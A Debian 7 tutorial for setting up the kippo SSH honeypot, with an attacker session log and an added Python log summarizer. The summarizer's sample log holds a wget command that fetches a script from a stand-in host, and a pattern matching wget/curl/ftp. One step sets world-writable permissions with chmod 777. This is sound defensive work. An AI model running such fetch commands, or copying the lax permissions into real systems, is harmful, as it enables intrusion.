Installing an SSH honeypot on Debian 7 (kippo)
1. Install the prerequisites
apt-get install python-twisted authbind
2. Create the user, plus the directories and files it needs to run
adduser kippo
touch /etc/authbind/byport/22
chown kippo:kippo /etc/authbind/byport/22
chmod 777 /etc/authbind/byport/22
cd /home/kippo
su kippo
3. Pull the honeypot
svn checkout http://kippo.googlecode.com/svn/trunk/ ./kippo
4. Change the configs
mv kippo.cfg.dist kippo.cfg
Then, in kippo.cfg, change the port from 2222 to 22.
Then, in start.sh, change the line
- twistd -y kippo.tac -l log/kippo.log --pidfile kippo.pid
+ authbind --deep twistd -y kippo.tac -l log/kippo.log --pidfile kippo.pid
5. Start kippo:
./start.sh
kippo@XXX:~/kippo$ ./start.sh
Starting kippo in background...Generating RSA keypair...
done.
6. From here on, all that is left is to watch the log in /home/kippo/kippo/log/kippo.log
Once the password has been brute-forced (the default password is 123456), the attacker lands in a kind of virtual shell in which they cannot see any real information, while every step they take is logged. Here is part of the log:
2013-11-20 18:03:46+0400 [SSHService ssh-userauth on HoneyPotTransport,0,xx.xx.xx.xx] login attempt [root/123456] succeeded
2013-11-20 18:03:46+0400 [SSHService ssh-userauth on HoneyPotTransport,0,xx.xx.xx.xx] root authenticated with keyboard-interactive
2013-11-20 18:03:46+0400 [SSHService ssh-userauth on HoneyPotTransport,0,xx.xx.xx.xx] starting service ssh-connection
2013-11-20 18:03:46+0400 [SSHService ssh-connection on HoneyPotTransport,0,xx.xx.xx.xx] got channel session request
2013-11-20 18:03:46+0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,xx.xx.xx.xx] channel open
2013-11-20 18:03:46+0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,xx.xx.xx.xx] pty request: xterm (24, 80, 0, 0)
2013-11-20 18:03:46+0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,xx.xx.xx.xx] Terminal size: 24 80
2013-11-20 18:03:46+0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,xx.xx.xx.xx] getting shell
2013-11-20 18:03:46+0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,xx.xx.xx.xx] Opening TTY log: log/tty/20131120-180346-4421.log
2013-11-20 18:03:46+0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,xx.xx.xx.xx] /etc/motd resolved into /etc/motd
2013-11-20 18:03:48+0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,xx.xx.xx.xx] CMD: ls
2013-11-20 18:03:48+0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,xx.xx.xx.xx] Command found: ls
2013-11-20 18:03:49+0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,xx.xx.xx.xx] CMD: ls -la
2013-11-20 18:03:49+0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,xx.xx.xx.xx] Command found: ls -la
2013-11-20 18:03:56+0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,xx.xx.xx.xx] CMD: ls /
2013-11-20 18:03:56+0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,xx.xx.xx.xx] Command found: ls /
2013-11-20 18:04:03+0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,xx.xx.xx.xx] CMD: ls /root/
2013-11-20 18:04:03+0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,xx.xx.xx.xx] Command found: ls /root/
2013-11-20 18:04:06+0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,xx.xx.xx.xx] CMD: ls -al /root/
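As an added example (not part of the original post and not kippo's own code), a small Python script that summarizes kippo.log by source address: login outcomes, the commands typed in the fake shell, and how many of those tried to fetch a file. The log lines are constructed in the format shown above; the addresses are documentation placeholders, and the wget/curl/ftp pattern is an assumption about what counts as a fetch.

```python
import re
from collections import defaultdict

# Constructed sample lines in kippo's log format (mirroring the excerpt above);
# the source addresses are documentation placeholders, not real indicators.
SAMPLE_LOG = """\
2013-11-20 18:03:40+0400 [SSHService ssh-userauth on HoneyPotTransport,0,192.0.2.10] login attempt [root/admin] failed
2013-11-20 18:03:46+0400 [SSHService ssh-userauth on HoneyPotTransport,0,192.0.2.10] login attempt [root/123456] succeeded
2013-11-20 18:03:48+0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,192.0.2.10] CMD: ls
2013-11-20 18:03:48+0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,192.0.2.10] Command found: ls
2013-11-20 18:03:49+0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,192.0.2.10] CMD: ls -la
2013-11-20 18:04:10+0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,192.0.2.10] CMD: wget http://example.invalid/x.sh
2013-11-20 18:05:01+0400 [SSHService ssh-userauth on HoneyPotTransport,1,198.51.100.7] login attempt [admin/admin] failed
"""

# Every kippo line closes its bracketed prefix with ",<session-id>,<source-ip>]"
LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) \[[^\]]*?,(?P<sid>\d+),(?P<ip>[^\],]+)\] (?P<msg>.*)$"
)
LOGIN_RE = re.compile(
    r"login attempt \[(?P<user>[^/]+)/(?P<pw>[^\]]*)\] (?P<result>succeeded|failed)"
)
# Assumed heuristic: commands that pull something onto the box are worth counting.
FETCH_RE = re.compile(r"^(wget|curl|ftp)\b")


def parse_line(line):
    """Split one kippo log line into timestamp, session id, source ip and message."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def summarize(log_text):
    """Group events by source ip: login outcomes, commands typed, fetch attempts."""
    summary = defaultdict(
        lambda: {"failed": 0, "succeeded": 0, "commands": [], "fetches": 0}
    )
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue  # lines that do not carry a session/ip prefix are skipped
        rec = summary[ev["ip"]]
        login = LOGIN_RE.search(ev["msg"])
        if login:
            rec[login.group("result")] += 1
        elif ev["msg"].startswith("CMD: "):
            cmd = ev["msg"][len("CMD: "):]
            rec["commands"].append(cmd)
            if FETCH_RE.match(cmd):
                rec["fetches"] += 1
    return dict(summary)


if __name__ == "__main__":
    for ip, rec in summarize(SAMPLE_LOG).items():
        print(ip, rec)
```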